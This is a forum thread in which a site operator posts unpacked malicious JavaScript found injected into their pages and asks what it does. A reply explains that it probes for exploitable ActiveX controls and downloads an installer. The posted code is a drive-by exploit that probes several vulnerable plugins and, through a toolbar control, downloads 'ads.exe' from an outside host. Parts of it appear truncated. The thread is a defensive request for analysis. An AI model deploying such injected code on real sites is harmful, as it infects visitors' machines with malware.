Hi Theres a malicious JS code getting injected into the pages in our network. It was packed (eval(packer function)) and after unpacking to see it contents, I see that it creates a whole of ActiveXObjects. Anyone have any clue as to what this may be doing ? What on earth is clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 ? if (document.cookie.indexOf('OKSUN') == -1) { try { var e; var ado = (document.createElement("object")); ado.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"); var as = ado.createobject("Adodb.Stream", "") } catch(e){}; finally { var expires = new Date(); expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000); document.cookie = 'OKSUN=SUN;path=/;expires=' + expires.toGMTString(); document.write("<\/script>"); if(e != "[object Error]") { document.write("<\/script>") } else { try { var f; var storm = new ActiveXObject("MPS.StormPlayer") } catch(f){}; finally { if (f != "[object Error]") { document.write("<\/script>"); document.write("") } } try { var g; var pps = new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1") } catch(g){}; finally { if (g != "[object Error]") { document.write("<\/script>"); document.write("") } } try { var h; var thunder = new ActiveXObject("DPClient.Vod") } catch(h){}; finally { if (h != "[object Error]") { document.write("<\/script>"); document.write("") } } try { var i; var yahoo = new ActiveXObject("GLCHAT.GLChatCtrl.1") } catch(i){}; finally { if (i != "[object Error]") { document.write("") } } try { var j; var obj = new ActiveXObject("BaiduBar.Tool") } catch(j){}; finally { if (j != "[object Error]") { obj.DloadDS("http://k.222360.com/ads/ads.cab", "ads.exe", 0); document.write("") } } if (f == "[object Error]" && g == "[object Error]" && h == "[object Error]" && i == "[object Error]" && j == "[object Error]") { document.write("") } } } } PHP:
Looks like it's attempting to create an instance of a video player, Baidu Search toolbar, or download an installer. Either to artificially inflate some numbers somewhere, or install some nastyware. That code itself is the least of your worries, how it got there is your primary concern.